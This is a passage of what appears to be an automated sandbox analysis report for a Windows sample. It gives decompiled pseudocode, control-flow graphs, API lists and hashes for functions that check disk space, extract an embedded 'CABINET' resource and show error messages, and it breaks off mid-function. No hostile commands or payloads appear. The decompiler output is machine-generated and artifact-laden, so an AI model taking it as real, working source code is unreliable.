                                                                                                                                                                                                                                                control_flow_graph 324 10597d-1059b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1059bb-1059d8 call 1044b9 call 106285 324->325 326 1059dd-105a1b GetDiskFreeSpaceA 324->326 341 105c05-105c14 call 106ce0 325->341 327 105ba1-105bde memset call 106285 GetLastError FormatMessageA 326->327 328 105a21-105a4a MulDiv 326->328 338 105be3-105bfc call 1044b9 SetCurrentDirectoryA 327->338 328->327 331 105a50-105a6c GetVolumeInformationA 328->331 334 105ab5-105aca SetCurrentDirectoryA 331->334 335 105a6e-105ab0 memset call 106285 GetLastError FormatMessageA 331->335 340 105acc-105ad1 334->340 335->338 351 105c02 338->351 344 105ae2-105ae4 340->344 345 105ad3-105ad8 340->345 349 105ae6 344->349 350 105ae7-105af8 344->350 345->344 347 105ada-105ae0 345->347 347->340 347->344 349->350 353 105af9-105afb 350->353 354 105c04 351->354 355 105b05-105b08 353->355 356 105afd-105b03 353->356 354->341 357 105b20-105b27 355->357 358 105b0a-105b1b call 1044b9 355->358 356->353 356->355 360 105b52-105b5b 357->360 361 105b29-105b33 357->361 358->351 364 105b62-105b6d 360->364 361->360 363 105b35-105b50 361->363 363->364 365 105b76-105b7d 364->365 366 105b6f-105b74 364->366 368 105b83 365->368 369 105b7f-105b81 365->369 367 105b85 366->367 370 105b96-105b9f 367->370 371 105b87-105b94 call 10268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E0010597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x109124 = E00106285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E001044B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x109a34 & 0x00000008;
							if(( *0x109a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x109a38; // 0x0
								_t110 =  *((intOrPtr*)(0x1089e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x109124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0010268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x109a38; // 0x0
							_t110 =  *((intOrPtr*)(0x1089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1089e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x109a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E001044B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x109124 = E00106285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E001044B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x109124 = E00106285();
					_t66 = 0;
					L33:
					return E00106CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                                0x0010597d
                                                                                                                                                                                                                                                0x00105988
                                                                                                                                                                                                                                                0x0010598f
                                                                                                                                                                                                                                                0x0010599a
                                                                                                                                                                                                                                                0x001059a6
                                                                                                                                                                                                                                                0x001059a8
                                                                                                                                                                                                                                                0x001059af
                                                                                                                                                                                                                                                0x001059b9
                                                                                                                                                                                                                                                0x001059dd
                                                                                                                                                                                                                                                0x001059e4
                                                                                                                                                                                                                                                0x001059f1
                                                                                                                                                                                                                                                0x001059fe
                                                                                                                                                                                                                                                0x00105a0b
                                                                                                                                                                                                                                                0x00105a13
                                                                                                                                                                                                                                                0x00105a19
                                                                                                                                                                                                                                                0x00105a1b
                                                                                                                                                                                                                                                0x00105ba1
                                                                                                                                                                                                                                                0x00105baf
                                                                                                                                                                                                                                                0x00105bbd
                                                                                                                                                                                                                                                0x00105bd8
                                                                                                                                                                                                                                                0x00105bde
                                                                                                                                                                                                                                                0x00105be3
                                                                                                                                                                                                                                                0x00105bec
                                                                                                                                                                                                                                                0x00105bf0
                                                                                                                                                                                                                                                0x00105bfc
                                                                                                                                                                                                                                                0x00105c02
                                                                                                                                                                                                                                                0x00105c02
                                                                                                                                                                                                                                                0x00105c02
                                                                                                                                                                                                                                                0x00105c04
                                                                                                                                                                                                                                                0x00105c04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105c04
                                                                                                                                                                                                                                                0x00105a27
                                                                                                                                                                                                                                                0x00105a3a
                                                                                                                                                                                                                                                0x00105a46
                                                                                                                                                                                                                                                0x00105a48
                                                                                                                                                                                                                                                0x00105a4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105a64
                                                                                                                                                                                                                                                0x00105a6a
                                                                                                                                                                                                                                                0x00105a6c
                                                                                                                                                                                                                                                0x00105abc
                                                                                                                                                                                                                                                0x00105ac2
                                                                                                                                                                                                                                                0x00105ac9
                                                                                                                                                                                                                                                0x00105aca
                                                                                                                                                                                                                                                0x00105aca
                                                                                                                                                                                                                                                0x00105acc
                                                                                                                                                                                                                                                0x00105acc
                                                                                                                                                                                                                                                0x00105acf
                                                                                                                                                                                                                                                0x00105ad1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105ad3
                                                                                                                                                                                                                                                0x00105ad6
                                                                                                                                                                                                                                                0x00105ad8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105ada
                                                                                                                                                                                                                                                0x00105adc
                                                                                                                                                                                                                                                0x00105add
                                                                                                                                                                                                                                                0x00105add
                                                                                                                                                                                                                                                0x00105ae0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105ae0
                                                                                                                                                                                                                                                0x00105ae2
                                                                                                                                                                                                                                                0x00105ae4
                                                                                                                                                                                                                                                0x00105ae6
                                                                                                                                                                                                                                                0x00105ae6
                                                                                                                                                                                                                                                0x00105ae6
                                                                                                                                                                                                                                                0x00105ae9
                                                                                                                                                                                                                                                0x00105aeb
                                                                                                                                                                                                                                                0x00105af0
                                                                                                                                                                                                                                                0x00105af6
                                                                                                                                                                                                                                                0x00105af8
                                                                                                                                                                                                                                                0x00105af9
                                                                                                                                                                                                                                                0x00105af9
                                                                                                                                                                                                                                                0x00105afb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105afd
                                                                                                                                                                                                                                                0x00105aff
                                                                                                                                                                                                                                                0x00105b00
                                                                                                                                                                                                                                                0x00105b03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b03
                                                                                                                                                                                                                                                0x00105b05
                                                                                                                                                                                                                                                0x00105b08
                                                                                                                                                                                                                                                0x00105b20
                                                                                                                                                                                                                                                0x00105b27
                                                                                                                                                                                                                                                0x00105b52
                                                                                                                                                                                                                                                0x00105b52
                                                                                                                                                                                                                                                0x00105b5b
                                                                                                                                                                                                                                                0x00105b62
                                                                                                                                                                                                                                                0x00105b6b
                                                                                                                                                                                                                                                0x00105b6d
                                                                                                                                                                                                                                                0x00105b76
                                                                                                                                                                                                                                                0x00105b7d
                                                                                                                                                                                                                                                0x00105b83
                                                                                                                                                                                                                                                0x00105b7f
                                                                                                                                                                                                                                                0x00105b7f
                                                                                                                                                                                                                                                0x00105b7f
                                                                                                                                                                                                                                                0x00105b6f
                                                                                                                                                                                                                                                0x00105b72
                                                                                                                                                                                                                                                0x00105b72
                                                                                                                                                                                                                                                0x00105b85
                                                                                                                                                                                                                                                0x00105b98
                                                                                                                                                                                                                                                0x00105b9e
                                                                                                                                                                                                                                                0x00105b87
                                                                                                                                                                                                                                                0x00105b8f
                                                                                                                                                                                                                                                0x00105b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b85
                                                                                                                                                                                                                                                0x00105b29
                                                                                                                                                                                                                                                0x00105b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b35
                                                                                                                                                                                                                                                0x00105b48
                                                                                                                                                                                                                                                0x00105b4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b4a
                                                                                                                                                                                                                                                0x00105b0f
                                                                                                                                                                                                                                                0x00105b16
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b16
                                                                                                                                                                                                                                                0x00105a7c
                                                                                                                                                                                                                                                0x00105a8a
                                                                                                                                                                                                                                                0x00105aa5
                                                                                                                                                                                                                                                0x00105aab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001059bb
                                                                                                                                                                                                                                                0x001059c0
                                                                                                                                                                                                                                                0x001059c7
                                                                                                                                                                                                                                                0x001059d1
                                                                                                                                                                                                                                                0x001059d6
                                                                                                                                                                                                                                                0x00105c05
                                                                                                                                                                                                                                                0x00105c14
                                                                                                                                                                                                                                                0x00105c14

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001059A8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 001059AF
                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00105A13
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00105A40
                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00105A64
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00105A7C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00105A98
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00105AA5
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00105BFC
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4237285672-0
                                                                                                                                                                                                                                                • Opcode ID: 2adaf1847c79a25c82d3e7bfc39a43bdccbf647f44f7d130ec6dd1752e59e666
                                                                                                                                                                                                                                                • Instruction ID: e45a4e6f8bf3b25855445e6c8b8cc5c4a4e70382b6b4947422afb3082b10d098
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2adaf1847c79a25c82d3e7bfc39a43bdccbf647f44f7d130ec6dd1752e59e666
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F71A0B1A0020CAFEB259B60CC85BFB77AEEB48344F5440A9F585D3581DBB09E848F60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 374 104fe0-10501a call 10468f FindResourceA LoadResource LockResource 377 105020-105027 374->377 378 105161-105163 374->378 379 105057-10505e call 104efd 377->379 380 105029-105051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 105060-105077 call 1044b9 379->383 384 10507c-1050b4 379->384 380->379 388 105107-10510e 383->388 389 1050b6-1050da 384->389 390 1050e8-105104 call 1044b9 384->390 391 105110-105117 FreeResource 388->391 392 10511d-10511f 388->392 401 105106 389->401 402 1050dc 389->402 390->401 391->392 394 105121-105127 392->394 395 10513a-105141 392->395 394->395 398 105129-105135 call 1044b9 394->398 399 105143-10514a 395->399 400 10515f 395->400 398->395 399->400 404 10514c-105159 SendMessageA 399->404 400->378 401->388 405 1050e3-1050e6 402->405 404->400 405->390 405->401
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00104FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x109144 = E0010468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x109140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x108584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x108584, 0x841), 5); // executed
				}
				_t10 = E00104EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00104CA0, E00104CC0, E00104980, E00104A50, E00104AD0, E00104B60, E00104BC0, 1, 0x109148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x109148; // 0x0
						_t24 =  *0x108584; // 0x0
						E001044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x101140, 0, E00104CD0, 0, 0x109140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x108584; // 0x0
					E001044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x109140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x109140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x1091d8; // 0x0
						if(_t47 == 0) {
							E001044B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x108a38 & 0x00000001) == 0 && ( *0x109a34 & 0x00000001) == 0) {
						SendMessageA( *0x108584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                                0x00104fe0
                                                                                                                                                                                                                                                0x00104fe6
                                                                                                                                                                                                                                                0x00104ff9
                                                                                                                                                                                                                                                0x0010500d
                                                                                                                                                                                                                                                0x00105013
                                                                                                                                                                                                                                                0x0010501a
                                                                                                                                                                                                                                                0x00105163
                                                                                                                                                                                                                                                0x00105163
                                                                                                                                                                                                                                                0x00105020
                                                                                                                                                                                                                                                0x00105027
                                                                                                                                                                                                                                                0x00105037
                                                                                                                                                                                                                                                0x00105051
                                                                                                                                                                                                                                                0x00105051
                                                                                                                                                                                                                                                0x00105057
                                                                                                                                                                                                                                                0x0010505e
                                                                                                                                                                                                                                                0x001050a7
                                                                                                                                                                                                                                                0x001050ad
                                                                                                                                                                                                                                                0x001050b4
                                                                                                                                                                                                                                                0x001050e8
                                                                                                                                                                                                                                                0x001050e8
                                                                                                                                                                                                                                                0x001050ee
                                                                                                                                                                                                                                                0x001050ff
                                                                                                                                                                                                                                                0x00105104
                                                                                                                                                                                                                                                0x00105106
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105106
                                                                                                                                                                                                                                                0x001050cd
                                                                                                                                                                                                                                                0x001050d3
                                                                                                                                                                                                                                                0x001050da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001050dd
                                                                                                                                                                                                                                                0x001050e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105060
                                                                                                                                                                                                                                                0x00105060
                                                                                                                                                                                                                                                0x00105070
                                                                                                                                                                                                                                                0x00105075
                                                                                                                                                                                                                                                0x00105107
                                                                                                                                                                                                                                                0x00105107
                                                                                                                                                                                                                                                0x0010510e
                                                                                                                                                                                                                                                0x00105111
                                                                                                                                                                                                                                                0x00105117
                                                                                                                                                                                                                                                0x00105117
                                                                                                                                                                                                                                                0x0010511f
                                                                                                                                                                                                                                                0x00105121
                                                                                                                                                                                                                                                0x00105127
                                                                                                                                                                                                                                                0x00105135
                                                                                                                                                                                                                                                0x00105135
                                                                                                                                                                                                                                                0x00105127
                                                                                                                                                                                                                                                0x00105141
                                                                                                                                                                                                                                                0x00105159
                                                                                                                                                                                                                                                0x00105159
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010515f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00104FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00105006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0010500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 00105030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00105037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 0010504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00105051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00105111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00105159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: 891c78d950ffcad1148732046d191d3af2b2e6a85481de588979a65d151131c9
                                                                                                                                                                                                                                                • Instruction ID: cb461f454ae2cb9eee6ebe1d0db30053b9f4e72fa01b4a0250096f0c42e685ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 891c78d950ffcad1148732046d191d3af2b2e6a85481de588979a65d151131c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9931C6F0780706BBE7205B61ADC9F67365DBB08755F044024FBC2A29E2DFF99C808A65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001044B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 406 1044b9-1044f8 407 104679-10467b 406->407 408 1044fe-104525 LoadStringA 406->408 411 10467c-10468c call 106ce0 407->411 409 104562-104568 408->409 410 104527-10452e call 10681f 408->410 412 10456b-104570 409->412 420 104530-10453d call 1067c9 410->420 421 10453f 410->421 412->412 416 104572-10457c 412->416 418 1045c9-1045cb 416->418 419 10457e-104580 416->419 424 104607-104617 LocalAlloc 418->424 425 1045cd-1045cf 418->425 422 104583-104588 419->422 420->421 426 104544-104554 MessageBoxA 420->426 421->426 422->422 429 10458a-10458c 422->429 427 10455a-10455d 424->427 428 10461d-104628 call 101680 424->428 431 1045d2-1045d7 425->431 426->427 427->411 435 10462d-10463d MessageBeep call 10681f 428->435 433 10458f-104594 429->433 431->431 434 1045d9-1045ed LocalAlloc 431->434 433->433 436 104596-1045ad LocalAlloc 433->436 434->427 437 1045f3-104605 call 10171e 434->437 444 10464e 435->444 445 10463f-10464c call 1067c9 435->445 436->427 440 1045af-1045c7 call 10171e 436->440 437->435 440->435 448 104653-104677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E001044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x108a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x109a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00101680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0010171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0010171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0010681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E001067C9(_t74, _t74);
